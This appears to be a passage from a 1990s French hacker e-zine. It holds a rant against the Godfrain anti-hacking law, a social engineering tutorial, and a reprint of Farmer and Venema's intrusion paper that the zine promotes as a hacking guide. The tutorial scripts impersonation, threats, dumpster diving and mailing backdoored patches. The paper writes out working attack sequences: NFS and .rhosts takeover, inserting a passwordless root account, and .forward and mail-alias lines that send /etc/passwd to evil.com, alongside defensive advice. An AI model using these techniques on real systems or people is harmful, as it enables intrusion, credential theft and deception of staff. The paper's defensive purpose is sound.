personne en public et une encore meilleure raison pour ne jamais, Oh grand
jamais, donner ses coordonnées ou son numéro de téléphone.
>La DST et la loi Godfrain:
==========================
Personnellement, j'en ai beaucoup voulu à la DST pour ses actions
que je trouvais injustes mais finalement, on ne peut pas trop s'attaquer
(au point de vue idéologique je parle) à la DST et à ses actions.
Mais la DST n'est qu'un outil du pouvoir et par pouvoir, je fais référence
au systäme soit-disant "démocratique" non au mouvement politique qui
pourrait àtre en place à ce moment. Je ne veux pas traiter de politique
ici, ce n'est absolument pas le but de ce Newsletter/Technical Journal.
Ce qui est mauvais est en fait seulement la Loi Godfrain anti-hacker.
Cette loi en effet désigne comme délit le fait de venir sur un systàme
d'information. Mais à ce moment, comment différencier un systäme oó l'on
a le droit d'accäder d'un systàme oó cela est interdit.
Un message: "Acces à cet ordinateur interdit aux personnes non autorisées"
ne suffit pas à mon avis.
Qui sont les personnes non autorisées?
De plus, ce genre de message est généralement en Anglais, je ne suis
absolument pas pour la francisation de tout mais tout le monde ne comprend
pas l'anglais! [FUCK TOUBON au fait, ++NeurAlien/94]
De toute facon, la loi reste la màme pour les systämes ayant une banniäre de
prévention que pour les systämes sans. Ainsi, demain on peut venir m'arräter
pour àtre allé sur RTEL ou sur TEASER!
Est-ce normal?
A ce moment, c'est la porte ouverte à la loi de classe... En effet, une telle
loi sera applicable à toute personne et seule les personnes gànantes pour
l'état seront visées.
Dans cette vision, on aura bientìt plus besoin de justifier une arrestation.
Et pourtant ce n'est pas "1984", ce sont seulement les conséquences de 1988
(date du vote de cette loi).
J'aimerai interviewer les votants pour cette loi et voir s'ils mesuraient
l'ampleur de leur vote.
>CONCLUSION:
===========
Nous possédons quand màme des moyens de nous faire entendre.
La branche active des H / P peut laisser des messages d'informations sur les
systàmes "ouverts" et la branche médiatique peut informer les mass-médias.
Mais là encore, le gouvernement aura beaucoup de mal à revenir sur une de
ses erreurs et utilisera tout son pouvoir de manipulation d'opinion pour
persuader les Franáais du bien fondé de cette loi.
Nous avons màme la possibilité de faire un lobbie comme aux USA, un
groupe de pression et faire changer cette loi. Mais tout reste à faire et
nous ne devons pas laisser ces politicards grabataires, avides de pouvoir et
d'argent faire des lois répressives donnant aux juges-pantin les pleins
pouvoirs sur nos existences.
L'image de l'underground a été trop souvent terni par les sociétés
ayant peur de notre capacité à montrer leurs incompétences et leurs
manipulations douteuses et aussi par les gouvernements voulant brider et
dominer les moyens informatique et, pour cela, les limitärent à leurs
technocrates et leurs industries de pointe qu'ils controlent déja.
Imaginez seulement le réseau étendu à chaque citoyen d'un pays.
Ce serait la libre discussion et avec quelques rägles pour rendre le réseau
viable, personne n'aurait plus à faire la guerre pour faire entendre son
opinion. Ne serait-ce pas là la démocratie?
Il est temps de montrer cette crasse politique et économique qui
a déja sérieusement limité l'extension de ces merveilleuses technologies.
Sensibilisez votre entourage. Montez vos propre moyens d'actions et faites
entendre votre opinion. Nous somme une force qui peut träs bien libérer
les réseaux de la main-mise des sociétés et de l'état.
L I B E R O N S L E S R E S E A U X ! ! !
free the net !
-%!% N0 Way %!%-
Volume I, Numéro 3, Partie 3.10
><
:O :o :I :! :/ L'art du social engineering :O :o :I :! :/
><
par NeurAlien
Si utile contre les grosses entreprise "à la big brother", le social
engineering permet d'attaquer un des points les plus faible de la société:
le personnel.
Je vais vous enseigner ici les choses que j'ai connue d'une pratique
courante et de l'enseignement de The Dude, maitre en l'art du social
engineering à Hack-Tic en Hollande.
Tout d'abord, le concept. Le social engineering couremment abrevié SE
est l'art de se faire passer pour quelqu'un d'autre pour avoir des informations
sur n'importe quoi.
Pour cela, il faut etre convaicant, réagir comme la vraie personne et surtout
utiliser beaucoup de psychologie.
Exemple de SE classique:
Employée de FT au service exterieur: "France telecom bonjour,"
Hacker: "Bonjour, Monsieur Levallois du CPE d'Orléans" [Toujours essayer de
placer le maximum
d'acronymes dans la
conversation]
H: "Nous avons besoin de la liste des préfixes de numéro vert internationaux
par pays car nous avons un probläme avec un des carriers."
FT: "Pardon? Je ne comprends pas bien. "
H: "J'ai besoin de la liste des 0590 indiquant le pays selon le préfixe!"
FT: "Attendez monsieur, je cherche... <pause> alors, Pour sprint....."
[ Et voila, c'est gagné ! ]
LA REGLE ULTIME DE CET ART
Il y a une chose et une seule qui vous garantira une maitrise parfaite
des correspondants lors d'une séance de SE, c'est la PRATIQUE.
On peut lire tout ce que l'on voudra sur la serrurerie, si on ne pratique pas,
on ne sera jamais un serrurier.
Donc lisez ce G-Phile avec toute l'attention que vos cellules grises
peuvent y mettre et lancez vous.
Quelques rägles de base:
=======================
- preparez un petit papier avant d'appeler mentionnant qui vous etes, ce que
vous voulez et preparant des reponses toutes pràtes pour certaines questions
bateaux. Mettez au point le scenario, votre nom, ce que vous voulez.
- Toujours garder l'initiative dans la conversation: c'est vous qui posez les
questions.
- Ne pas faire du social engineering si votre voix est celle d'un jeune garcon
de 13 ans.
- ne jamais s'affoler ou raccrocher brutalement quand on vous pose un question
qui vous dérange.
- faites le par fun si vous le voulez mais vous n'aurez jamais les meilleurs
résultats si vous le faites tout le temps d'une cabine sans préparation.
- plus on a d'informations pointues sur la société, plus le SE est possible.
Il est des fois TRES fructueux de faire les poubelles de la société avant
d'essayer le SE sur ses employés.
Quelques scénarios qui marchent:
===============================
vous pouvez vous faire passer pour
. utilisateur/acheteur
. personne connue
. urgence/flic/docteur
. questionnaire/enquàte
. pour la presse, ca marche tres souvent mais on ne recoit pas d'information
détaillée.
Il faut aussi jouer sur les sentiments de votre correspondant:
- la peur: en cas de probleme, faites comprendre que cela peut lui attirer des
ennuis: foudres du patron, (pour l'employé)
fisc sur le dos, (pour le petit patron d'une PME)
arrestation, (pour un individu)
coupure du téléphone,
coupure EDF...
- plaisir: collaboration contre cadeau ex: questionnaire avec un
&greedy cadeau au bout si les reponses semblent véritable en
expliquant que c'est parce beaucoup de monde ne répond pas
en toute honneteté.
On peut aussi annoncer un FAX qui doit arriver et qui est assez confidentiel et
necessitant une réponse immédiate.
Les bruits de bureaux en bruit de fond ou de salle d'ordinateur sont
interressant.
Etre à deux peut àtre utile car ainsi si il y a un probleme, vous dites:
"bon, je vous passe mon supérieur mais il ne va pas àtre satisfait"
appuyez sur une touche du téléphone et envoyez une petite musique directement
au telephone."
Ne pas dire que vous etes de la tele: cela ne fait pas reel!
Pour un questionnaire, il peut àtre interressant de noyer les questions
interressantes dans un flot de question ininterressantes.
Un bon plan pour un coup de fil est:
- depart lent ou on explique bien
- des que la personne cäde, on accéläre le rythme pour qu'elle reste dans
cet état d'esprit.
Un autre est d'envoyer des patchs constructeurs par la poste concernant des
failles de sécurité avec des backdoor dans les patchs.
On peut aussi essayer de simuler un appel de la sécurité et d'envoyer un login.
Il y a aussi la possibilité de se faire passer pour la femme d'un informaticien
qui lui a demandé de télécharger un fichier depuis son téléphone de voiture
pour qu'il puisse aller directement à un ses rendez vous apres etre passer chez
lui prendre le fichier et qui n'arrive pas a se connecter. Enfin, se faire
passer marche souvent bien quand on dit qu'on a un probleme car les femmes sont
généralement prises pour des burnes en informatique.
Utilisez les idiots.
En cas de probläme lors de la conversation:
==========================================
Si on vous demande "Pourquoi voulez vous ceci..."
2 rägles: - toujours répondre
- emphase sur le "PARCE QUE" (psycho involved)
(réponse bateau : "on en a besoin pour...." )
Montrer que si ils facilitent les choses vous rendrez les choses plus faciles
pour eux aussi.
Si votre correspondant refuse de vous répondre, demandez leur superviseur
ou supérieur.
Les bonnes cibles:
=================
Le SE dépend énormément de votre adaptation à la personne qui est à
l'autre bout du fil. Vous devez toujours àtre en position de supériorité.
Pour cela, il faut déja attaquer des personnes qui ont l'habitude de recevoir
des ordres.
Ainsi, il est préférable de ne pas parler à l'administrateur mais
plutot à son assistant.
Bibliographie:
=============
Pr. Zuin "The first 4/5 minutes"
Dale Carnegie "Hoz to win friends and influence people"
Baladin Press "The private handbook"
-%!% N0 Way %!%-
Volume I, Numéro 3, Partie 3.11
Nota: j'ai mis ce fichier car il traite presque parfaitement des nouveau type
de hacking que l'on peut faire.
C'est vraiment un document EXCELLENT !!
_ _ _
_Improving the Security of Your Site by Breaking Into it_
Dan Farmer Wietse Venema
Sun Microsystems Eindhoven University of Technology
zen@sun.com wietse@wzv.win.tue.nl
Introduction
------------
Every day, all over the world, computer networks and hosts are being
broken into. The level of sophistication of these attacks varies
widely; while it is generally believed that most break-ins succeed due
to weak passwords, there are still a large number of intrusions that use
more advanced techniques to break in. Less is known about the latter
types of break-ins, because by their very nature they are much harder to
detect.
-----
CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley.
Purdue. Sun. You name it, we've seen it broken into. Anything that is
on the Internet (and many that isn't) seems to be fairly easy game. Are
these targets unusual? What happened?
Fade to...
A young boy, with greasy blonde hair, sitting in a dark room. The room
is illuminated only by the luminescense of the C64's 40 character
screen. Taking another long drag from his Benson and Hedges cigarette,
the weary system cracker telnets to the next faceless ".mil" site on his
hit list. "guest -- guest", "root -- root", and "system -- manager" all
fail. No matter. He has all night... he pencils the host off of his
list, and tiredly types in the next potential victim...
This seems to be the popular image of a system cracker. Young,
inexperienced, and possessing vast quantities of time to waste, to get
into just one more system. However, there is a far more dangerous type
of system cracker out there. One who knows the ins and outs of the
latest security auditing and cracking tools, who can modify them for
specific attacks, and who can write his/her own programs. One who not
only reads about the latest security holes, but also personally
discovers bugs and vulnerabilities. A deadly creature that can both
strike poisonously and hide its tracks without a whisper or hint of a
trail. The uebercracker is here.
-----
Why "uebercracker"? The idea is stolen, obviously, from Nietzsche's
uebermensch, or, literally translated into English, "over man."
Nietzsche used the term not to refer to a comic book superman, but
instead a man who had gone beyond the incompetence, pettiness, and
weakness of the everyday man. The uebercracker is therefore the system
cracker who has gone beyond simple cookbook methods of breaking into
systems. An uebercracker is not usually motivated to perform random
acts of violence. Targets are not arbitrary -- there is a purpose,
whether it be personal monetary gain, a hit and run raid for
information, or a challenge to strike a major or prestigious site or
net.personality. An uebercracker is hard to detect, harder to stop, and
hardest to keep out of your site for good.
Overview
--------
In this paper we will take an unusual approach to system security.
Instead of merely saying that something is a problem, we will look
through the eyes of a potential intruder, and show _why_ it is one. We
will illustrate that even seemingly harmless network services can become
valuable tools in the search for weak points of a system, even when
these services are operating exactly as they are intended to.
In an effort to shed some light on how more advanced intrusions occur,
this paper outlines various mechanisms that crackers have actually used
to obtain access to systems and, in addition, some techniques we either
suspect intruders of using, or that we have used ourselves in tests or
in friendly/authorized environments.
Our motivation for writing this paper is that system administrators are
often unaware of the dangers presented by anything beyond the most
trivial attacks. While it is widely known that the proper level of
protection depends on what has to be protected, many sites appear to
lack the resources to assess what level of host and network security is
adequate. By showing what intruders can do to gain access to a remote
site, we are trying to help system administrators to make _informed_
decisions on how to secure their site -- or not. We will limit the
discussion to techniques that can give a remote intruder access to a
(possibly non-interactive) shell process on a UNIX host. Once this is
achieved, the details of obtaining root privilege are beyond the scope
of this work -- we consider them too site-dependent and, in many cases,
too trivial to merit much discussion.
We want to stress that we will not merely run down a list of bugs or
security holes -- there will always be new ones for a potential attacker
to exploit. The purpose of this paper is to try to get the reader to
look at her or his system in a new way -- one that will hopefully afford
him or her the opportunity to _understand_ how their system can be
compromised, and how.
We would also like to reiterate to the reader that the purpose of this
paper is to show you how to test the security of your own site, not how
to break into other people's systems. The intrusion techniques we
illustrate here will often leave traces in your system auditing logs --
it might be constructive to examine them after trying some of these
attacks out, to see what a real attack might look like. Certainly other
sites and system administrators will take a very dim view of your
activities if you decide to use their hosts for security testing without
advance authorization; indeed, it is quite possible that legal action
may be pursued against you if they perceive it as an attack.
There are four main parts to the paper. The first part is the
introduction and overview. The second part attempts to give the reader
a feel for what it is like to be an intruder and how to go from knowing
nothing about a system to compromising its security. This section goes
over actual techniques to gain information and entrance and covers basic
strategies such as exploiting trust and abusing improperly configured
basic network services (ftp, mail, tftp, etc.) It also discusses
slightly more advanced topics, such as NIS and NFS, as well as various
common bugs and configuration problems that are somewhat more OS or
system specific. Defensive strategies against each of the various
attacks are also covered here.
The third section deals with trust: how the security of one system
depends on the integrity of other systems. Trust is the most complex
subject in this paper, and for the sake of brevity we will limit the
discussion to clients in disguise.
The fourth section covers the basic steps that a system administrator
may take to protect her or his system. Most of the methods presented
here are merely common sense, but they are often ignored in practice --
one of our goals is to show just how dangerous it can be to ignore basic
security practices.
Case studies, pointers to security-related information, and software are
described in the appendices at the end of the paper.
While exploring the methods and strategies discussed in this paper we we
wrote SATAN (Security Analysis Tool for Auditing Networks.) Written in
shell, perl, expect and C, it examines a remote host or set of hosts and
gathers as much information as possible by remotely probing NIS, finger,
NFS, ftp and tftp, rexd, and other services. This information includes
the presence of various network information services as well as
potential security flaws -- usually in the form of incorrectly setup or
configured network services, well-known bugs in system or network
utilities, or poor or ignorant policy decisions. It then can either
report on this data or use an expert system to further investigate any
potential security problems. While SATAN doesn't use all of the methods
that we discuss in the paper, it has succeeded with ominous regularity
in finding serious holes in the security of Internet sites. It will be
posted and made available via anonymous ftp when completed; Appendix A
covers its salient features.
Note that it isn't possible to cover all possible methods of breaking
into systems in a single paper. Indeed, we won't cover two of the most
effective methods of breaking into hosts: social engineering and
password cracking. The latter method is so effective, however, that
several of the strategies presented here are geared towards acquiring
password files. In addition, while windowing systems (X, OpenWindows,
etc.) can provide a fertile ground for exploitation, we simply don't
know many methods that are used to break into remote systems. Many
system crackers use non-bitmapped terminals which can prevent them from
using some of the more interesting methods to exploit windowing systems
effectively (although being able to monitor the victim's keyboard is
often sufficient to capture passwords). Finally, while worms, viruses,
trojan horses, and other malware are very interesting, they are not
common (on UNIX systems) and probably will use similar techniques to the
ones we describe in this paper as individual parts to their attack
strategy.
Gaining Information
-------------------
Let us assume that you are the head system administrator of Victim
Incorporated's network of UNIX workstations. In an effort to secure
your machines, you ask a friendly system administrator from a nearby
site (evil.com) to give you an account on one of her machines so that
you can look at your own system's security from the outside.
What should you do? First, try to gather information about your
(target) host. There is a wealth of network services to look at:
finger, showmount, and rpcinfo are good starting points. But don't stop
there -- you should also utilize DNS, whois, sendmail (smtp), ftp, uucp,
and as many other services as you can find. There are so many methods
and techniques that space precludes us from showing all of them, but we
will try to show a cross-section of the most common and/or dangerous
strategies that we have seen or have thought of. Ideally, you would
gather such information about all hosts on the subnet or area of attack
-- information is power -- but for now we'll examine only our intended
target.
To start out, you look at what the ubiquitous finger command shows you
(assume it is 6pm, Nov 6, 1993):
victim % finger @victim.com
[victim.com]
Login Name TTY Idle When Where
zen Dr. Fubar co 1d Wed 08:00 death.com
Good! A single idle user -- it is likely that no one will notice if you
actually manage to break in.
Now you try more tactics. As every finger devotee knows, fingering "@",
"0", and "", as well as common names, such as root, bin, ftp, system,
guest, demo, manager, etc., can reveal interesting information. What
that information is depends on the version of finger that your target is
running, but the most notable are account names, along with their home
directories and the host that they last logged in from.
To add to this information, you can use rusers (in particular with the
-l flag) to get useful information on logged-in users.
Trying these commands on victim.com reveals the following information,
presented in a compressed tabular form to save space:
Login Home-dir Shell Last login, from where
----- -------- ----- ----------------------
root / /bin/sh Fri Nov 5 07:42 on ttyp1 from big.victim.com
bin /bin Never logged in
nobody / Tue Jun 15 08:57 on ttyp2 from server.victim.co
daemon / Tue Mar 23 12:14 on ttyp0 from big.victim.com
sync / /bin/sync Tue Mar 23 12:14 on ttyp0 from big.victim.com
zen /home/zen /bin/bash On since Wed Nov 6 on ttyp3 from death.com
sam /home/sam /bin/csh Wed Nov 5 05:33 on ttyp3 from evil.com
guest /export/foo /bin/sh Never logged in
ftp /home/ftp Never logged in
Both our experiments with SATAN and watching system crackers at work
have proved to us that finger is one of the most dangerous services,
because it is so useful for investigating a potential target. However,
much of this information is useful only when used in conjunction with
other data.
For instance, running showmount on your target reveals:
evil % showmount -e victim.com
export list for victim.com:
/export (everyone)
/var (everyone)
/usr easy
/export/exec/kvm/sun4c.sunos.4.1.3 easy
/export/root/easy easy
/export/swap/easy easy
Note that /export/foo is exported to the world; also note that this is
user guest's home directory. Time for your first break-in! In this
case, you'll mount the home directory of user "guest." Since you don't
have a corresponding account on the local machine and since root cannot
modify files on an NFS mounted filesystem, you create a "guest" account
in your local password file. As user guest you can put an .rhosts entry
in the remote guest home directory, which will allow you to login to the
target machine without having to supply a password.
evil # mount victim.com:/export/foo /foo
evil # cd /foo
evil # ls -lag
total 3
1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
1 drwx--x--x 9 10001 daemon 1024 Aug 3 15:49 guest
evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd
evil # ls -lag
total 3
1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
1 drwx--x--x 9 guest daemon 1024 Aug 3 15:49 guest
evil # su guest
evil % echo victim.com >> guest/.rhosts
evil % rlogin victim.com
Welcome to victim.com!
victim %
If, instead of home directories, victim.com were exporting filesystems
with user commands (say, /usr or /usr/local/bin), you could replace a
command with a trojan horse that executes any command of your choice.
The next user to execute that command would execute your program.
We suggest that filesystems be exported:
o Read/write only to specific, trusted clients.
o Read-only, where possible (data or programs can often be
exported in this manner.)
If the target has a "+" wildcard in its /etc/hosts.equiv (the default in
various vendor's machines) or has the netgroups bug (CERT advisory
91:12), any non-root user with a login name in the target's password
file can rlogin to the target without a password. And since the user
"bin" often owns key files and directories, your next attack is to try
to log in to the target host and modify the password file to let you
have root access:
evil % whoami
bin
evil % rsh victim.com csh -i
Warning: no access to tty; thus no job control in this shell...
victim % ls -ldg /etc
drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc
victim % cd /etc
victim % mv passwd pw.old
victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd
victim % ^D
evil % rlogin victim.com -l toor
Welcome to victim.com!
victim #
A few notes about the method used above; "rsh victim.com csh -i" is used
to initially get onto the system because it doesn't leave any traces in
the wtmp or utmp system auditing files, making the rsh invisible for
finger and who. The remote shell isn't attached to a pseudo-terminal,
however, so that screen-oriented programs such as pagers and editors
will fail -- but it is very handy for brief exploration.
The COPS security auditing tool (see appendix D) will report key files
or directories that are writable to accounts other than the
superuser. If you run SunOS 4.x you can apply patch 100103 to fix most
file permission problems. On many systems, rsh probes as shown above,
even when successful, would remain completely unnoticed; the tcp wrapper
(appendix D), which logs incoming connections, can help to expose such
activities.
----
What now? Have you uncovered all the holes on your target system? Not
by a long shot. Going back to the finger results on your target, you
notice that it has an "ftp" account, which usually means that anonymous
ftp is enabled. Anonymous ftp can be an easy way to get access, as it
is often misconfigured. For example, the target may have a complete
copy of the /etc/passwd file in the anonymous ftp ~ftp/etc directory
instead of a stripped down version. In this example, though, you see
that the latter doesn't seem to be true (how can you tell without
actually examining the file?) However, the home directory of ftp on
victim.com is writable. This allows you to remotely execute a command
-- in this case, mailing the password file back to yourself -- by the
simple method of creating a .forward file that executes a command when
mail is sent to the ftp account. This is the same mechanism of piping
mail to a program that the "vacation" program uses to automatically
reply to mail messages.
evil % cat forward_sucker_file
"|/bin/mail zen@evil.com < /etc/passwd"
evil % ftp victim.com
Connected to victim.com
220 victim FTP server ready.
Name (victim.com:zen): ftp
331 Guest login ok, send ident as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> ls -lga
200 PORT command successful.
150 ASCII data connection for /bin/ls (192.192.192.1,1129) (0 bytes).
total 5
drwxr-xr-x 4 101 1 512 Jun 20 1991 .
drwxr-xr-x 4 101 1 512 Jun 20 1991 ..
drwxr-xr-x 2 0 1 512 Jun 20 1991 bin
drwxr-xr-x 2 0 1 512 Jun 20 1991 etc
drwxr-xr-x 3 101 1 512 Aug 22 1991 pub
226 ASCII Transfer complete.
242 bytes received in 0.066 seconds (3.6 Kbytes/s)
ftp> put forward_sucker_file .forward
43 bytes sent in 0.0015 seconds (28 Kbytes/s)
ftp> quit
evil % echo test | mail ftp@victim.com
Now you simply wait for the password file to be sent back to you.
The security auditing tool COPS will check your anonymous ftp setup; see
the man page for ftpd, the documentation/code for COPS, or CERT advisory
93:10 for information on how to set up anonymous ftp correctly.
Vulnerabilities in ftp are often a matter of incorrect ownership or
permissions of key files or directories. At the very least, make sure
that ~ftp and all "system" directories and files below ~ftp are owned by
root and are not writable by any user.
While looking at ftp, you can check for an older bug that was once
widely exploited:
% ftp -n
ftp> open victim.com
Connected to victim.com
220 victim.com FTP server ready.
ftp> quote user ftp
331 Guest login ok, send ident as password.
ftp> quote cwd ~root
530 Please login with USER and PASS.
ftp> quote pass ftp
230 Guest login ok, access restrictions apply.
ftp> ls -al / (or whatever)
If this works, you now are logged in as root, and able to modify the
password file, or whatever you desire. If your system exhibits this
bug, you should definitely get an update to your ftpd daemon, either
from your vendor or (via anon ftp) from ftp.uu.net.
The wuarchive ftpd, a popular replacement ftp daemon put out by the
Washington University in Saint Louis, had almost the same problem. If
your wuarchive ftpd pre-dates April 8, 1993, you should replace it by a
more recent version.
Finally, there is a program vaguely similar to ftp -- tftp, or the
trivial file transfer program. This daemon doesn't require any password
for authentication; if a host provides tftp without restricting the
access (usually via some secure flag set in the inetd.conf file), an
attacker can read and write files anywhere on the system. In the
example, you get the remote password file and place it in your local
/tmp directory:
evil % tftp
tftp> connect victim.com
tftp> get /etc/passwd /tmp/passwd.victim
tftp> quit
For security's sake, tftp should not be run; if tftp is necessary, use
the secure option/flag to restrict access to a directory that has no
valuable information, or run it under the control of a chroot wrapper
program.
----
If none of the previous methods have worked, it is time to go on to more
drastic measures. You have a friend in rpcinfo, another very handy
program, sometimes even more useful than finger. Many hosts run RPC
services that can be exploited; rpcinfo can talk to the portmapper and
show you the way. It can tell you if the host is running NIS, if it is
a NIS server or slave, if a diskless workstation is around, if it is
running NFS, any of the info services (rusersd, rstatd, etc.), or any
other unusual programs (auditing or security related). For instance,
going back to our sample target:
evil % rpcinfo -p victim.com [output trimmed for brevity's sake]
program vers proto port
100004 2 tcp 673 ypserv
100005 1 udp 721 mountd
100003 2 udp 2049 nfs
100026 1 udp 733 bootparam
100017 1 tcp 1274 rexd
In this case, you can see several significant facts about our target;
first of which is that it is an NIS server. It is perhaps not widely
known, but once you know the NIS domainname of a server, you can get any
of its NIS maps by a simple rpc query, even when you are outside the
subnet served by the NIS server (for example, using the YPX program that
can be found in the comp.sources.misc archives on ftp.uu.net). In
addition, very much like easily guessed passwords, many systems use
easily guessed NIS domainnames. Trying to guess the NIS domainname is
often very fruitful. Good candidates are the fully and partially
qualified hostname (e.g. "victim" and "victim.com"), the organization
name, netgroup names in "showmount" output, and so on. If you wanted to
guess that the domainname was "victim", you could type:
evil % ypwhich -d victim victim.com
Domain victim not bound.
This was an unsuccessful attempt; if you had guessed correctly it would
have returned with the host name of victim.com's NIS server. However,
note from the NFS section that victim.com is exporting the "/var"
directory to the world. All that is needed is to mount this directory
and look in the "yp" subdirectory -- among other things you will see
another subdirectory that contains the domainname of the target.
evil # mount victim.com:/var /foo
evil # cd /foo
evil # /bin/ls -alg /foo/yp
total 17
1 drwxr-sr-x 4 root staff 512 Jul 12 14:22 .
1 drwxr-sr-x 11 root staff 512 Jun 29 10:54 ..
11 -rwxr-xr-x 1 root staff 10993 Apr 22 11:56 Makefile
1 drwxr-sr-x 2 root staff 512 Apr 22 11:20 binding
2 drwxr-sr-x 2 root staff 1536 Jul 12 14:22 foo_bar
[...]
In this case, "foo_bar" is the NIS domain name.
In addition, the NIS maps often contain a good list of user/employee
names as well as internal host lists, not to mention passwords for
cracking.
Appendix C details the results of a case study on NIS password files.
----
You note that the rpcinfo output also showed that victim.com runs rexd.
Like the rsh daemon, rexd processes requests of the form "please execute
this command as that user". Unlike rshd, however, rexd does not care if
the client host is in the hosts.equiv or .rhost files. Normally the rexd
client program is the "on" command, but it only takes a short C program
to send arbitrary client host and userid information to the rexd server;
rexd will happily execute the command. For these reasons, running rexd
is similar to having no passwords at all: all security is in the client,
not in the server where it should be. Rexd security can be improved
somewhat by using secure RPC.
----
While looking at the output from rpcinfo, you observe that victim.com
also seems to be a server for diskless workstations. This is evidenced
by the presence of the bootparam service, which provides information to
the diskless clients for booting. If you ask nicely, using
BOOTPARAMPROC_WHOAMI and provide the address of a client, you can get
its NIS domainname. This can be very useful when combined with the fact
that you can get arbitrary NIS maps (such as the password file) when you
know the NIS domainname. Here is a sample code snippet to do just that
(bootparam is part of SATAN.)
char *server;
struct bp_whoami_arg arg; /* query */
struct bp_whoami_res res; /* reply */
/* initializations omitted... */
callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS, BOOTPARAMPROC_WHOAMI,
xdr_bp_whoami_arg, &arg, xdr_bp_whoami_res, &res);
printf("%s has nisdomain %s\n", server, res.domain_name);
The showmount output indicated that "easy" is a diskless client of
victim.com, so we use its client address in the BOOTPARAMPROC_WHOAMI
query:
evil % bootparam victim.com easy.victim.com
victim.com has nisdomain foo_bar
----
NIS masters control the mail aliases for the NIS domain in question.
Just like local mail alias files, you can create a mail alias that will
execute commands when mail is sent to it (a once popular example of this
is the "decode" alias which uudecodes mail files sent to it.) For
instance, here you create an alias "foo", which mails the password file
back to evil.com by simply mailing any message to it:
nis-master # echo 'foo: "| mail zen@evil.com < /etc/passwd "' >> /etc/aliases
nis-master # cd /var/yp
nis-master # make aliases
nis-master # echo test | mail -v foo@victim.com
Hopefully attackers won't have control of your NIS master host, but even
more hopefully the lesson is clear -- NIS is normally insecure, but if
an attacker has control of your NIS master, then s/he effectively has
control of the client hosts (e.g. can execute arbitrary commands).
There aren't many effective defenses against NIS attacks; it is an
insecure service that has almost no authentication between clients and
servers. To make things worse, it seems fairly clear that arbitrary
maps can be forced onto even master servers (e.g., it is possible to
treat an NIS server as a client). This, obviously, would subvert the
entire schema. If it is absolutely necessary to use NIS, choosing a
hard to guess domainname can help slightly, but if you run diskless
clients that are exposed to potential attackers then it is trivial for
an attacker to defeat this simple step by using the bootparam trick to
get the domainname. If NIS is used to propagate the password maps, then
shadow passwords do not give additional protection because the shadow
map is still accessible to any attacker that has root on an attacking
host. Better is to use NIS as little as possible, or to at least
realize that the maps can be subject to perusal by potentially hostile
forces.
Secure RPC goes a long way to diminish the threat, but it has its own
problems, primarily in that it is difficult to administer, but also in
that the cryptographic methods used within are not very strong. It has
been rumored that NIS+, Sun's new network information service, fixes
some of these problems, but until now it has been limited to running on
Suns, and thus far has not lived up to the promise of the design.
Finally, using packet filtering (at the very least port 111) or
securelib (see appendix D), or, for Suns, applying Sun patch 100482-02
all can help.
----
The portmapper only knows about RPC services. Other network services
can be located with a brute-force method that connects to all network
ports. Many network utilities and windowing systems listen to specific
ports (e.g. sendmail is on port 25, telnet is on port 23, X windows is
usually on port 6000, etc.) SATAN includes a program that scans the
ports of a remote hosts and reports on its findings; if you run it
against our target, you see:
evil % tcpmap victim.com
Mapping 128.128.128.1
port 21: ftp
port 23: telnet
port 25: smtp
port 37: time
port 79: finger
port 512: exec
port 513: login
port 514: shell
port 515: printer
port 6000: (X)
This suggests that victim.com is running X windows. If not protected
properly (via the magic cookie or xhost mechanisms), window displays can
be captured or watched, user keystrokes may be stolen, programs executed
remotely, etc. Also, if the target is running X and accepts a telnet to
port 6000, that can be used for a denial of service attack, as the
target's windowing system will often "freeze up" for a short period of
time. One method to determine the vulnerability of an X server is to
connect to it via the XOpenDisplay() function; if the function returns
NULL then you cannot access the victim's display (opendisplay is part of
SATAN):
char *hostname;
if (XOpenDisplay(hostname) == NULL) {
printf("Cannot open display: %s\n", hostname);
} else {
printf("Can open display: %s\n", hostname);
}
evil % opendisplay victim.com:0
Cannot open display: victim.com:0
X terminals, though much less powerful than a complete UNIX system, can
have their own security problems. Many X terminals permit unrestricted
rsh access, allowing you to start X client programs in the victim's
terminal with the output appearing on your own screen:
evil % xhost +xvictim.victim.com
evil % rsh xvictim.victim.com telnet victim.com -display evil.com
In any case, give as much thought to your window security as your
filesystem and network utilities, for it can compromise your system as
surely as a "+" in your hosts.equiv or a passwordless (root) account.
----
Next, you examine sendmail. Sendmail is a very complex program that has
a long history of security problems, including the infamous "wiz"
command (hopefully long since disabled on all machines). You can often
determine the OS, sometimes down to the version number, of the target,
by looking at the version number returned by sendmail. This, in turn,
can give you hints as to how vulnerable it might be to any of the
numerous bugs. In addition, you can see if they run the "decode" alias,
which has its own set of problems:
evil % telnet victim.com 25
connecting to host victim.com (128.128.128.1.), port 25
connection open
220 victim.com Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 18:00 PDT
expn decode
250 <"|/usr/bin/uudecode">
quit
Running the "decode" alias is a security risk -- it allows potential
attackers to overwrite any file that is writable by the owner of that
alias -- often daemon, but potentially any user. Consider this piece of
mail -- this will place "evil.com" in user zen's .rhosts file if it is
writable:
evil % echo "evil.com" | uuencode /home/zen/.rhosts | mail decode@victim.com
If no home directories are known or writable, an interesting variation
of this is to create a bogus /etc/aliases.pag file that contains an
alias with a command you wish to execute on your target. This may work
since on many systems the aliases.pag and aliases.dir files, which
control the system's mail aliases, are writable to the world.
evil % cat decode
bin: "| cat /etc/passwd | mail zen@evil.com"
evil % newaliases -oQ/tmp -oA`pwd`/decode
evil % uuencode decode.pag /etc/aliases.pag | mail decode@victom.com
evil % /usr/lib/sendmail -fbin -om -oi bin@victim.com < /dev/null
A lot of things can be found out by just asking sendmail if an address
is acceptable (vrfy), or what an address expands to (expn). When the
finger or rusers services are turned off, vrfy and expn can still be
used to identify user accounts or targets. Vrfy and expn can also be
used to find out if the user is piping mail through any program that
might be exploited (e.g. vacation, mail sorters, etc.). It can be a
good idea to disable the vrfy and expn commands: in most versions, look
at the source file srvrsmtp.c, and either delete or change the two lines
in the CmdTab structure that have the strings "vrfy" and "expn". Sites
without source can still disable expn and vrfy by just editing the
